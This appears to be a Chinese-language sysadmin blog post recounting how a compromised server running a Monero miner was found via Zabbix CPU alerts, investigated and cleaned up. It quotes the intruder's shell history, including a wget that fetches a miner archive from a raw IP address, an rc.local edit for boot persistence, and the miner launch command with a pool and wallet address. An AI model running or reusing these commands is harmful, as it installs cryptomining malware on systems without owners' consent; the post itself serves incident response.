服务器被入侵当做挖矿肉鸡

2021-08-10 11:35:32 浏览数 (1)

早上到公司发现zabbix有一个报警:一台服务器的CPU使用率达到100%! 1.立即登录该服务器查看CPU top10

代码语言:javascript复制
ps aux | head -1; | ps aux | grep -v PID | sort -rn -k 4 |head

发现 有一个yam开头的进程CPU已经占用120%,(此处无截图) 经确认,并非业务上的应用,凭经验分析,可以断定是被入侵了。

2.find找一下本地有没有yam相关的目录

代码语言:javascript复制
find / -name yam

已经查到了(下图),就在root家目录下,有压缩包,还有解压的目录,痕迹也太明显了吧! 打开看一下里面的内容发现是一个挖矿机。

3.查看下登录日志

代码语言:javascript复制
last

这三个IP是美国的,不知道是不是代理,然后看一下登录进来都做什么操作了:

代码语言:javascript复制
history

贴出关键部分

代码语言:javascript复制
884  wget http://210.245.92.160:9090/miner.tgz
  
885  vi /etc/rc.d/rc.local
  
886  tar zxvf miner.tgz
  
887  cd yam-yvg1900-M7v-linux64-generic
  
888  cd linux64-generic
  
889  nohup ./yam -c 1 -M stratum tcp://48zmbpHJyke7y9uewNAS7miDMqQcz8RH7BTqKaYFtVWx2UJ7mzLqVd8KWjeW1Bu5jr2zcUZqTHzYofn3kT76PsndSb5h3M3:x@erebor.dwarfpool.com:8005:8050:8080:8100/xmr

很明显,下载了这个包,解压运行了,还加了开机启动,不过竟然没有清除痕迹就走了。

4.看一下他get的这个网站

好吧,自己做的一个页面方便别人下载矿机用的。 在里面的文件发现软件的作者

5.清理工作 kill 掉进程 删除root家目录的包 删除/etc/rc.d/rc.local中的开机启动项 更改root密码

先做这么多,大家还有什么好的建议请多指教。

0 人点赞